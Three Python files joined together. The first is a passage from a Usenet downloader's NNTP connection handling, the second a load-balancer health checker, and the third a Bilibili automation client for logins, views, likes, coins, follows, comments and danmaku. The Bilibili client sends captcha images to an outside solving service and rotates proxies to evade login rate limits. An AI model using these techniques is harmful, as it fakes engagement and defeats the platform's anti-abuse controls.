error = T('This server does not allow SSL on this port')
# Catch certificate errors
if type(error) == CertificateError or 'CERTIFICATE_VERIFY_FAILED' in str(error):
error = T('Server %s uses an untrusted certificate [%s]') % (self.nw.server.host, str(error))
        # Prevent logging a flood of errors, and don't log when testing a server
if error not in self.nw.server.warning and self.nw.server.id != -1:
logging.error(error)
msg = "Failed to connect: %s" % (str(error))
msg = "%s %s@%s:%s" % (msg, self.nw.thrdnum, self.host, self.port)
self.error_msg = msg
if self.blocking:
raise socket.error(errno.ECONNREFUSED, msg)
else:
logging.info(msg)
self.nw.server.warning = msg
class NewsWrapper(object):
def __init__(self, server, thrdnum, block=False):
self.server = server
self.thrdnum = thrdnum
self.blocking = block
self.timeout = None
self.article = None
self.data = ''
self.lines = []
self.nntp = None
self.recv = None
self.connected = False
self.user_sent = False
self.pass_sent = False
self.group = None
self.user_ok = False
self.pass_ok = False
self.force_login = False
def init_connect(self, write_fds):
self.nntp = NNTP(self.server.hostip, self.server.port, self.server.info, self.server.ssl,
self.server.send_group, self, self.server.username, self.server.password,
self.blocking, write_fds)
self.recv = self.nntp.sock.recv
self.timeout = time.time() + self.server.timeout
def finish_connect(self, code):
if not (self.server.username or self.server.password or self.force_login):
self.connected = True
self.user_sent = True
self.user_ok = True
self.pass_sent = True
self.pass_ok = True
if code in ('501',) and self.user_sent:
# Change to a sensible text
code = '481'
self.lines[0] = T('Authentication failed, check username/password.')
self.user_ok = True
self.pass_sent = True
if code == '480':
self.force_login = True
self.connected = False
self.user_sent = False
self.user_ok = False
self.pass_sent = False
self.pass_ok = False
if code in ('400', '502'):
raise NNTPPermanentError(self.lines[0])
elif not self.user_sent:
command = 'authinfo user %s\r\n' % self.server.username
self.nntp.sock.sendall(command)
self.user_sent = True
elif not self.user_ok:
if code == '381':
self.user_ok = True
elif code == '281':
# No login required
self.user_ok = True
self.pass_sent = True
self.pass_ok = True
self.connected = True
if self.user_ok and not self.pass_sent:
command = 'authinfo pass %s\r\n' % self.server.password
self.nntp.sock.sendall(command)
self.pass_sent = True
elif self.user_ok and not self.pass_ok:
if code != '281':
# Assume that login failed (code 481 or other)
raise NNTPPermanentError(self.lines[0])
else:
self.connected = True
self.timeout = time.time() + self.server.timeout
def body(self, precheck):
self.timeout = time.time() + self.server.timeout
if precheck:
if self.server.have_stat:
command = 'STAT <%s>\r\n' % (self.article.article)
else:
command = 'HEAD <%s>\r\n' % (self.article.article)
elif self.server.have_body:
command = 'BODY <%s>\r\n' % (self.article.article)
else:
command = 'ARTICLE <%s>\r\n' % (self.article.article)
self.nntp.sock.sendall(command)
def send_group(self, group):
self.timeout = time.time() + self.server.timeout
command = 'GROUP %s\r\n' % (group)
self.nntp.sock.sendall(command)
def recv_chunk(self, block=False):
""" Receive data, return #bytes, done, skip """
self.timeout = time.time() + self.server.timeout
while 1:
try:
if self.nntp.nw.server.ssl:
# SSL chunks come in 16K frames
# Setting higher limits results in slowdown
chunk = self.recv(16384)
else:
# Get as many bytes as possible
chunk = self.recv(262144)
break
except WantReadError as e:
# Workaround for Python <2.7.9 so we only catch WantReadError's
if not sabnzbd.HAVE_SSL_CONTEXT and e.errno != 2:
raise
# SSL connections will block until they are ready.
# Either ignore the connection until it responds
# Or wait in a loop until it responds
if block:
# time.sleep(0.0001)
continue
else:
return (0, False, True)
self.data += chunk
new_lines = self.data.split('\r\n')
# See if incorrect newline-only was used
# Do this as a special case to prevent using extra memory
# for normal articles
if len(new_lines) == 1 and '\r' not in self.data:
new_lines = self.data.split('\n')
self.data = new_lines.pop()
        # Undo NNTP dot-stuffing: remove the extra leading dot
for i in xrange(len(new_lines)):
if new_lines[i][:2] == '..':
new_lines[i] = new_lines[i][1:]
self.lines.extend(new_lines)
if self.lines and self.lines[-1] == '.':
self.lines = self.lines[1:-1]
return (len(chunk), True, False)
else:
return (len(chunk), False, False)
def soft_reset(self):
self.timeout = None
self.article = None
self.data = ''
self.lines = []
def hard_reset(self, wait=True, quit=True):
if self.nntp:
try:
if quit:
self.nntp.sock.sendall('QUIT\r\n')
time.sleep(0.1)
self.nntp.sock.close()
except:
pass
self.__init__(self.server, self.thrdnum)
# Wait before re-using this newswrapper
if wait:
# Reset due to error condition, use server timeout
self.timeout = time.time() + self.server.timeout
else:
# Reset for internal reasons, just wait 5 sec
self.timeout = time.time() + 5
def terminate(self, quit=False):
""" Close connection and remove nntp object """
if self.nntp:
try:
if quit:
self.nntp.sock.sendall('QUIT\r\n')
time.sleep(0.1)
self.nntp.sock.close()
except:
pass
del self.nntp
|
sfor_simple.py
|
# -*- coding: utf-8 -*-
import logging
import time
import datetime
import httplib
import random
from threading import Thread, Lock
class SforNodeInfo:
def __init__(self, host, port, check_path):
self.host = host
self.port = port
self.check_path = check_path
self.status = True
self.lock = Lock()
def disable(self):
with self.lock:
self.status = False
def enable(self):
with self.lock:
self.status = True
def backend_check(check_list, loop=True, wait_time=15, http_timeout=3):
while True:
for n in check_list:
conn = httplib.HTTPConnection(n.host, n.port, timeout=http_timeout)
status = False
try:
conn.request("GET", n.check_path)
res = conn.getresponse()
status = res.status / 100 == 2
except:
status = False
if status == False:
logging.info("sfor disable %s" % n.host)
n.disable()
else:
logging.info("sfor enable %s" % n.host)
n.enable()
logging.debug("sfor %s res: %d" % (n.host, n.status))
if loop == False:
break
else:
time.sleep(wait_time)
class SforSimple:
def __init__(self, node_list):
self.node_list = node_list
logging.debug("initial check start.")
backend_check(node_list, False)
logging.debug("initial check finish.")
th = Thread(target=backend_check, args=(node_list,))
th.daemon = True
th.start()
def resolv(self):
node_list = self.node_list
rnd = random.randint(0, len(node_list) - 1)
for i in range(len(node_list)):
n = (i + rnd) % len(node_list)
info = node_list[n]
stat = info.status
if stat == True:
return info.host
return None
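# A minimal usage sketch (hosts, ports and the health-check path below are placeholders,
# not part of the original module):
#
#     nodes = [SforNodeInfo("10.0.0.1", 8080, "/healthz"),
#              SforNodeInfo("10.0.0.2", 8080, "/healthz")]
#     sfor = SforSimple(nodes)    # runs one synchronous check, then starts a daemon checker thread
#     host = sfor.resolv()        # returns a healthy host chosen from a random offset, or None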
|
bilibiliapi.py
|
#!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
"""Bilibili Toolkit 哔哩哔哩工具箱
https://github.com/Hsury/Bilibili-Toolkit"""
banner = r"""
\\ //
\\ //
##################### ________ ___ ___ ___ ________ ___ ___ ___
## ## |\ __ \ |\ \ |\ \ |\ \ |\ __ \ |\ \ |\ \ |\ \
## // \\ ## \ \ \|\ /_\ \ \\ \ \ \ \ \\ \ \|\ /_\ \ \\ \ \ \ \ \
## // \\ ## \ \ __ \\ \ \\ \ \ \ \ \\ \ __ \\ \ \\ \ \ \ \ \
## ## \ \ \|\ \\ \ \\ \ \____ \ \ \\ \ \|\ \\ \ \\ \ \____ \ \ \
## www ## \ \_______\\ \__\\ \_______\\ \__\\ \_______\\ \__\\ \_______\\ \__\
## ## \|_______| \|__| \|_______| \|__| \|_______| \|__| \|_______| \|__|
#####################
\/ \/ 哔哩哔哩 (゜-゜)つロ 干杯~
"""
import base64
import chardet
import functools
import hashlib
import json
import os
import platform
import random
import requests
import rsa
import shutil
import subprocess
import sys
import threading
import time
from multiprocessing import freeze_support, Manager, Pool, Process
from urllib import parse
__author__ = "Hsury"
__email__ = "i@hsury.com"
__license__ = "SATA"
__version__ = "2020.7.20"
class Bilibili:
app_key = "bca7e84c2d947ac6"
patterns = {
'video': {
'id': 1,
'prefix': "https://www.bilibili.com/video/av",
},
'activity': {
'id': 4,
'prefix': "https://www.bilibili.com/blackboard/",
},
'gallery': {
'id': 11,
'prefix': "https://h.bilibili.com/",
},
'article': {
'id': 12,
'prefix': "https://www.bilibili.com/read/cv",
},
}
def __init__(self, https=True, queue=None):
self._session = requests.Session()
self._session.headers.update({'User-Agent': "Mozilla/5.0 BiliDroid/6.4.0 (bbcallen@gmail.com) os/android model/M1903F11I mobi_app/android build/6040500 channel/bili innerVer/6040500 osVer/9.0.0 network/2"})
self.__queue = queue
self.get_cookies = lambda: self._session.cookies.get_dict(domain=".bilibili.com")
self.get_csrf = lambda: self.get_cookies().get("bili_jct", "")
self.get_sid = lambda: self.get_cookies().get("sid", "")
self.get_uid = lambda: self.get_cookies().get("DedeUserID", "")
self.access_token = ""
self.refresh_token = ""
self.username = ""
self.password = ""
self.info = {
'ban': False,
'coins': 0,
'experience': {
'current': 0,
'next': 0,
},
'face': "",
'level': 0,
'nickname': "",
}
self.protocol = "https" if https else "http"
self.proxy = None
self.proxy_pool = set()
def _log(self, message):
log = f"[{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}][{self.username if self.username else '#' + self.get_uid() if self.get_uid() else ''}] {message}"
print(log)
self.__push_to_queue("log", log)
def _requests(self, method, url, decode_level=2, enable_proxy=True, retry=10, timeout=15, **kwargs):
if method in ["get", "post"]:
for _ in range(retry + 1):
try:
response = getattr(self._session, method)(url, timeout=timeout, proxies=self.proxy if enable_proxy else None, **kwargs)
return response.json() if decode_level == 2 else response.content if decode_level == 1 else response
except:
if enable_proxy:
self.set_proxy()
return None
def _solve_captcha(self, image):
url = "https://bili.dev:2233/captcha"
payload = {'image': base64.b64encode(image).decode("utf-8")}
response = self._requests("post", url, json=payload)
return response['message'] if response and response.get("code") == 0 else None
def __bvid_handle(args_index=None, kwargs_key="aid"):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
if args_index is not None and args_index < len(args):
result = Bilibili.bvid_to_aid(args[args_index])
if result:
args = list(args)
self._log(f"{args[args_index]}被自动转换为av{result}")
args[args_index] = result
if kwargs_key is not None and kwargs_key in kwargs:
result = Bilibili.bvid_to_aid(kwargs[kwargs_key])
if result:
self._log(f"{kwargs[kwargs_key]}被自动转换为av{result}")
kwargs[kwargs_key] = result
return func(*args, **kwargs)
return wrapper
return decorator
def __push_to_queue(self, manufacturer, data):
if self.__queue:
self.__queue.put({
'uid': self.get_uid(),
'time': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())),
'manufacturer': manufacturer,
'data': data,
})
@staticmethod
def bvid_to_aid(bvid="BV17x411w7KC"):
# Snippet source: https://www.zhihu.com/question/381784377/answer/1099438784
table = "fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF"
tr = {}
for i in range(58):
tr[table[i]] = i
s = [11, 10, 3, 8, 4, 6]
xor = 177451812
add = 8728348608
r = 0
try:
for i in range(6):
r += tr[bvid[s[i]]] * 58 ** i
return (r - add) ^ xor
except:
return None
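    # Example (comment only): with the table above, the commonly cited pair is
    # Bilibili.bvid_to_aid("BV17x411w7KC") == 170001 (the function's default argument);
    # any string that cannot be decoded simply yields None.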
@staticmethod
def calc_sign(param):
salt = "60698ba2f68e01ce44738920a0ffe768"
sign_hash = hashlib.md5()
sign_hash.update(f"{param}{salt}".encode())
return sign_hash.hexdigest()
def set_proxy(self, add=None):
if isinstance(add, str):
self.proxy_pool.add(add)
elif isinstance(add, list):
self.proxy_pool.update(add)
if self.proxy_pool:
proxy = random.sample(self.proxy_pool, 1)[0]
self.proxy = {self.protocol: f"{self.protocol}://{proxy}"}
# self._log(f"使用{self.protocol.upper()}代理: {proxy}")
else:
self.proxy = None
return self.proxy
    # Log in
def login(self, **kwargs):
def by_cookie():
url = f"{self.protocol}://api.bilibili.com/x/space/myinfo"
headers = {'Host': "api.bilibili.com"}
response = self._requests("get", url, headers=headers)
if response and response.get("code") != -101:
self._log("Cookie仍有效")
return True
else:
self._log("Cookie已失效")
return False
def by_token(force_refresh=False):
if not force_refresh:
param = f"access_key={self.access_token}&appkey={Bilibili.app_key}&ts={int(time.time())}"
url = f"{self.protocol}://passport.bilibili.com/api/v2/oauth2/info?{param}&sign={self.calc_sign(param)}"
response = self._requests("get", url)
if response and response.get("code") == 0:
self._session.cookies.set('DedeUserID', str(response['data']['mid']), domain=".bilibili.com")
self._log(f"Token仍有效, 有效期至{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time() + int(response['data']['expires_in'])))}")
param = f"access_key={self.access_token}&appkey={Bilibili.app_key}&gourl={self.protocol}%3A%2F%2Faccount.bilibili.com%2Faccount%2Fhome&ts={int(time.time())}"
url = f"{self.protocol}://passport.bilibili.com/api/login/sso?{param}&sign={self.calc_sign(param)}"
self._requests("get", url, decode_level=0)
if all(key in self.get_cookies() for key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"]):
self._log("Cookie获取成功")
return True
else:
self._log("Cookie获取失败")
url = f"{self.protocol}://passport.bilibili.com/api/v2/oauth2/refresh_token"
param = f"access_key={self.access_token}&appkey={Bilibili.app_key}&refresh_token={self.refresh_token}&ts={int(time.time())}"
payload = f"{param}&sign={self.calc_sign(param)}"
headers = {'Content-type': "application/x-www-form-urlencoded"}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
for cookie in response['data']['cookie_info']['cookies']:
self._session.cookies.set(cookie['name'], cookie['value'], domain=".bilibili.com")
self.access_token = response['data']['token_info']['access_token']
self.refresh_token = response['data']['token_info']['refresh_token']
self._log(f"Token刷新成功, 有效期至{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time() + int(response['data']['token_info']['expires_in'])))}")
return True
else:
self.access_token = ""
self.refresh_token = ""
self._log("Token刷新失败")
return False
def by_password():
def get_key():
url = f"{self.protocol}://passport.bilibili.com/api/oauth2/getKey"
payload = {
'appkey': Bilibili.app_key,
'sign': self.calc_sign(f"appkey={Bilibili.app_key}"),
}
while True:
response = self._requests("post", url, data=payload)
if response and response.get("code") == 0:
return {
'key_hash': response['data']['hash'],
'pub_key': rsa.PublicKey.load_pkcs1_openssl_pem(response['data']['key'].encode()),
}
else:
time.sleep(1)
while True:
key = get_key()
key_hash, pub_key = key['key_hash'], key['pub_key']
url = f"{self.protocol}://passport.bilibili.com/api/v2/oauth2/login"
param = f"appkey={Bilibili.app_key}&password={parse.quote_plus(base64.b64encode(rsa.encrypt(f'{key_hash}{self.password}'.encode(), pub_key)))}&username={parse.quote_plus(self.username)}"
payload = f"{param}&sign={self.calc_sign(param)}"
headers = {'Content-type': "application/x-www-form-urlencoded"}
response = self._requests("post", url, data=payload, headers=headers)
while True:
if response and response.get("code") is not None:
if response['code'] == -105:
url = f"{self.protocol}://passport.bilibili.com/captcha"
headers = {'Host': "passport.bilibili.com"}
response = self._requests("get", url, headers=headers, decode_level=1)
captcha = self._solve_captcha(response)
if captcha:
self._log(f"登录验证码识别结果: {captcha}")
key = get_key()
key_hash, pub_key = key['key_hash'], key['pub_key']
url = f"{self.protocol}://passport.bilibili.com/api/v2/oauth2/login"
param = f"appkey={Bilibili.app_key}&captcha={captcha}&password={parse.quote_plus(base64.b64encode(rsa.encrypt(f'{key_hash}{self.password}'.encode(), pub_key)))}&username={parse.quote_plus(self.username)}"
payload = f"{param}&sign={self.calc_sign(param)}"
headers = {'Content-type': "application/x-www-form-urlencoded"}
response = self._requests("post", url, data=payload, headers=headers)
else:
self._log(f"登录验证码识别服务暂时不可用, {'尝试更换代理' if self.proxy else '10秒后重试'}")
if not self.set_proxy():
time.sleep(10)
break
elif response['code'] == -449:
self._log("服务繁忙, 尝试使用V3接口登录")
url = f"{self.protocol}://passport.bilibili.com/api/v3/oauth2/login"
param = f"access_key=&actionKey=appkey&appkey={Bilibili.app_key}&build=6040500&captcha=&challenge=&channel=bili&cookies=&device=phone&mobi_app=android&password={parse.quote_plus(base64.b64encode(rsa.encrypt(f'{key_hash}{self.password}'.encode(), pub_key)))}&permission=ALL&platform=android&seccode=&subid=1&ts={int(time.time())}&username={parse.quote_plus(self.username)}&validate="
payload = f"{param}&sign={self.calc_sign(param)}"
headers = {'Content-type': "application/x-www-form-urlencoded"}
response = self._requests("post", url, data=payload, headers=headers)
elif response['code'] == 0 and response['data']['status'] == 0:
for cookie in response['data']['cookie_info']['cookies']:
self._session.cookies.set(cookie['name'], cookie['value'], domain=".bilibili.com")
self.access_token = response['data']['token_info']['access_token']
self.refresh_token = response['data']['token_info']['refresh_token']
self._log("登录成功")
return True
else:
self._log(f"登录失败 {response}")
return False
else:
self._log(f"当前IP登录过于频繁, {'尝试更换代理' if self.proxy else '1分钟后重试'}")
if not self.set_proxy():
time.sleep(60)
break
self._session.cookies.clear()
for name in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"]:
value = kwargs.get(name)
if value:
self._session.cookies.set(name, value, domain=".bilibili.com")
self.access_token = kwargs.get("access_token", "")
self.refresh_token = kwargs.get("refresh_token", "")
self.username = kwargs.get("username", "")
self.password = kwargs.get("password", "")
force_refresh_token = kwargs.get("force_refresh_token", False)
if (not force_refresh_token or not self.access_token or not self.refresh_token) and all(key in self.get_cookies() for key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"]) and by_cookie():
return True
elif self.access_token and self.refresh_token and by_token(force_refresh_token):
return True
elif self.username and self.password and by_password():
return True
else:
self._session.cookies.clear()
return False
    # Get user info
def get_user_info(self):
url = f"{self.protocol}://api.bilibili.com/x/space/myinfo?jsonp=jsonp"
headers = {
'Host': "api.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
self.info['ban'] = bool(response['data']['silence'])
self.info['coins'] = response['data']['coins']
self.info['experience']['current'] = response['data']['level_exp']['current_exp']
self.info['experience']['next'] = response['data']['level_exp']['next_exp']
self.info['face'] = response['data']['face']
self.info['level'] = response['data']['level']
self.info['nickname'] = response['data']['name']
self._log(f"{self.info['nickname']}(UID={self.get_uid()}), Lv.{self.info['level']}({self.info['experience']['current']}/{self.info['experience']['next']}), 拥有{self.info['coins']}枚硬币, 账号{'状态正常' if not self.info['ban'] else '被封禁'}")
return True
else:
self._log("用户信息获取失败")
return False
    # Modify privacy settings
def set_privacy(self, show_favourite=None, show_bangumi=None, show_tag=None, show_reward=None, show_info=None, show_game=None):
        # show_favourite = show [my favourites folder]
        # show_bangumi = show [followed bangumi]
        # show_tag = show [subscribed tags]
        # show_reward = show [recently coined videos]
        # show_info = show [profile info]
        # show_game = show [recently played games]
privacy = {
'fav_video': show_favourite,
'bangumi': show_bangumi,
'tags': show_tag,
'coins_video': show_reward,
'user_info': show_info,
'played_game': show_game,
}
url = f"{self.protocol}://space.bilibili.com/ajax/settings/getSettings?mid={self.get_uid()}"
headers = {
'Host': "space.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/",
}
response = self._requests("get", url, headers=headers)
if response and response.get("status") == True:
for key, value in privacy.items():
if response['data']['privacy'][key] == value:
privacy[key] = None
else:
self._log(f"隐私设置获取失败 {response}")
return False
url = f"{self.protocol}://space.bilibili.com/ajax/settings/setPrivacy"
headers = {
'Host': "space.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/",
}
fail = []
for key, value in privacy.items():
if value is not None:
payload = {
key: 1 if value else 0,
'csrf': self.get_csrf(),
}
response = self._requests("post", url, data=payload, headers=headers)
if not response or response.get("status") != True:
fail.append(key)
if not fail:
self._log("隐私设置修改成功")
return True
else:
self._log(f"隐私设置修改失败 {fail}")
return False
    # Exchange silver (melon seeds) for coins
def silver_to_coin(self, app=True, pc=False):
        # app = use the APP endpoint
        # pc = use the PC endpoint
if app:
param = f"access_key={self.access_token}&appkey={Bilibili.app_key}&ts={int(time.time())}"
url = f"{self.protocol}://api.live.bilibili.com/AppExchange/silver2coin?{param}&sign={self.calc_sign(param)}"
response = self._requests("get", url)
if response and response.get("code") == 0:
self._log("银瓜子兑换硬币(APP通道)成功")
else:
self._log(f"银瓜子兑换硬币(APP通道)失败 {response}")
if pc:
url = f"{self.protocol}://api.live.bilibili.com/pay/v1/Exchange/silver2coin"
payload = {
'platform': "pc",
'csrf_token': self.get_csrf(),
}
headers = {
'Host': "api.live.bilibili.com",
'Origin': "https://live.bilibili.com",
'Referer': "https://live.bilibili.com/exchange",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log("银瓜子兑换硬币(PC通道)成功")
else:
self._log(f"银瓜子兑换硬币(PC通道)失败 {response}")
    # Watch a video
@__bvid_handle(1, "aid")
def watch(self, aid):
        # aid = the video's av number
url = f"{self.protocol}://api.bilibili.com/x/web-interface/view?aid={aid}"
response = self._requests("get", url)
if response and response.get("data") is not None:
cid = response['data']['cid']
duration = response['data']['duration']
else:
self._log(f"av{aid}信息解析失败")
return False
url = f"{self.protocol}://api.bilibili.com/x/report/click/h5"
payload = {
'aid': aid,
'cid': cid,
'part': 1,
'did': self.get_sid(),
'ftime': int(time.time()),
'jsonp': "jsonp",
'lv': None,
'mid': self.get_uid(),
'csrf': self.get_csrf(),
'stime': int(time.time()),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
url = f"{self.protocol}://api.bilibili.com/x/report/web/heartbeat"
payload = {
'aid': aid,
'cid': cid,
'jsonp': "jsonp",
'mid': self.get_uid(),
'csrf': self.get_csrf(),
'played_time': 0,
'pause': False,
'realtime': duration,
'dt': 7,
'play_type': 1,
'start_ts': int(time.time()),
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
time.sleep(5)
payload['played_time'] = duration - 1
payload['play_type'] = 0
payload['start_ts'] = int(time.time())
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}观看成功")
return True
self._log(f"av{aid}观看失败 {response}")
return False
    # Like a video
    @__bvid_handle(1, "aid")
    def like(self, aid):
        # aid = video av number
url = f"{self.protocol}://api.bilibili.com/x/web-interface/archive/like"
payload = {
'aid': aid,
'like': 1,
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}点赞成功")
return True
else:
self._log(f"av{aid}点赞失败 {response}")
return False
    # Give coins to a video
    @__bvid_handle(1, "aid")
    def reward(self, aid, double=True):
        # aid = video av number
        # double = give two coins instead of one
url = f"{self.protocol}://api.bilibili.com/x/web-interface/coin/add"
payload = {
'aid': aid,
'multiply': 2 if double else 1,
'cross_domain': "true",
'csrf': self.get_csrf(),
}
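        # If a double-coin request fails, the return statement at the end of this method retries
        # once with a single coin before giving up.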
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}投{2 if double else 1}枚硬币成功")
return True
else:
self._log(f"av{aid}投{2 if double else 1}枚硬币失败 {response}")
return self.reward(aid, False) if double else False
    # Add a video to favourites
    @__bvid_handle(1, "aid")
    def favour(self, aid):
        # aid = video av number
url = f"{self.protocol}://api.bilibili.com/x/v2/fav/folder"
headers = {'Host': "api.bilibili.com"}
response = self._requests("get", url, headers=headers)
if response and response.get("data"):
fid = response['data'][0]['fid']
else:
self._log("fid获取失败")
return False
url = f"{self.protocol}://api.bilibili.com/x/v2/fav/video/add"
payload = {
'aid': aid,
'fid': fid,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}收藏成功")
return True
else:
self._log(f"av{aid}收藏失败 {response}")
return False
    # Triple action (like + coin + favourite)
    @__bvid_handle(1, "aid")
    def combo(self, aid):
        # aid = video av number
url = f"{self.protocol}://api.bilibili.com/x/web-interface/archive/like/triple"
payload = {
'aid': aid,
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}三连推荐成功")
return True
else:
self._log(f"av{aid}三连推荐失败 {response}")
return False
    # Share a video
    @__bvid_handle(1, "aid")
    def share(self, aid):
        # aid = video av number
url = f"{self.protocol}://api.bilibili.com/x/web-interface/share/add"
payload = {
'aid': aid,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}分享成功")
return True
else:
self._log(f"av{aid}分享失败 {response}")
return False
    # Follow a user
    def follow(self, mid, secret=False):
        # mid = UID of the user to follow
        # secret = follow quietly
url = f"{self.protocol}://api.bilibili.com/x/relation/modify"
payload = {
'fid': mid,
'act': 3 if secret else 1,
're_src': 11,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': f"https://space.bilibili.com/{mid}/",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"用户{mid}{'悄悄' if secret else ''}关注成功")
return True
else:
self._log(f"用户{mid}{'悄悄' if secret else ''}关注失败 {response}")
return False
    # Follow users in batch
    def follow_batch(self, mids):
        # mids = UIDs of the users to follow
url = f"{self.protocol}://api.bilibili.com/x/relation/batch/modify"
payload = {
'fids': ",".join(map(str, mids)),
'act': 1,
'csrf': self.get_csrf(),
're_src': 222,
}
headers = {
'Host': "api.bilibili.com",
'Referer': "https://www.bilibili.com/blackboard/live/activity-NfUS01P8.html",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"用户{', '.join(map(str, mids))}批量关注成功")
return True
else:
self._log(f"用户{', '.join(map(str, mids))}批量关注失败 {response}")
return False
    # Send a danmaku (bullet comment)
    @__bvid_handle(1, "aid")
    def danmaku_post(self, aid, message, page=1, moment=-1):
        # aid = video av number
        # message = danmaku text
        # page = part (P) number
        # moment = playback time at which the danmaku appears
url = f"{self.protocol}://api.bilibili.com/x/web-interface/view?aid={aid}"
response = self._requests("get", url)
if response and response.get("data") is not None:
page_info = {page['page']: {
'cid': page['cid'],
'duration': page['duration'],
} for page in response['data']['pages']}
if page in page_info:
oid = page_info[page]['cid']
duration = page_info[page]['duration']
else:
self._log(f"av{aid}不存在P{page}")
return False
else:
self._log(f"av{aid}信息解析失败")
return False
url = f"{self.protocol}://api.bilibili.com/x/v2/dm/post"
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
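        # Retry loop: when moment is -1 a random timestamp within the video is used, and error
        # code 36703 (posting too frequently) triggers a 10-second wait before retrying.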
while True:
payload = {
'type': 1,
'oid': oid,
'msg': message,
'aid': aid,
'progress': int(moment * 1E3) if moment != -1 else random.randint(0, duration * 1E3),
'color': 16777215,
'fontsize': 25,
'pool': 0,
'mode': 1,
'rnd': int(time.time() * 1E6),
'plat': 1,
'csrf': self.get_csrf(),
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") is not None:
if response['code'] == 0:
self._log(f"av{aid}(P{page})弹幕\"{message}\"发送成功")
return True
elif response['code'] == 36703:
self._log(f"av{aid}(P{page})弹幕发送频率过快, 10秒后重试")
time.sleep(10)
else:
self._log(f"av{aid}(P{page})弹幕\"{message}\"发送失败 {response}")
return False
    # Like a comment
    def comment_like(self, otype, oid, rpid):
        # otype = work type
        # oid = work ID
        # rpid = comment ID
if Bilibili.patterns.get(otype) is None:
return False
url = f"{self.protocol}://api.bilibili.com/x/v2/reply/action"
payload = {
'oid': oid,
'type': Bilibili.patterns[otype]['id'],
'rpid': rpid,
'action': 1,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8",
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"{Bilibili.patterns[otype]['prefix']}{oid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"评论{rpid}点赞成功")
return True
else:
self._log(f"评论{rpid}点赞失败 {response}")
return False
    # Post a comment
    def comment_post(self, otype, oid, message):
        # otype = work type
        # oid = work ID
        # message = comment text
if Bilibili.patterns.get(otype) is None:
return False
url = f"{self.protocol}://api.bilibili.com/x/v2/reply/add"
while True:
payload = {
'oid': oid,
'type': Bilibili.patterns[otype]['id'],
'message': message,
'plat': 1,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded; charset=UTF-8",
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"{Bilibili.patterns[otype]['prefix']}{oid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") is not None:
if response['code'] == 0:
self._log(f"作品{oid}提交评论\"{message}\"成功")
return True
elif response['code'] == 12015:
response = self._requests("get", response['data']['url'], headers=headers, decode_level=1)
captcha = self._solve_captcha(response)
if captcha:
self._log(f"评论验证码识别结果: {captcha}")
payload['code'] = captcha
else:
self._log(f"评论验证码识别服务暂时不可用, 1分钟后重试")
time.sleep(60)
elif response['code'] == 12035:
self._log(f"作品{oid}提交评论\"{message}\"失败, 该账号被UP主列入评论黑名单")
return False
elif response['code'] == -105:
if "code" in payload:
payload.pop("code")
else:
self._log(f"作品{oid}提交评论\"{message}\"失败 {response}")
return False
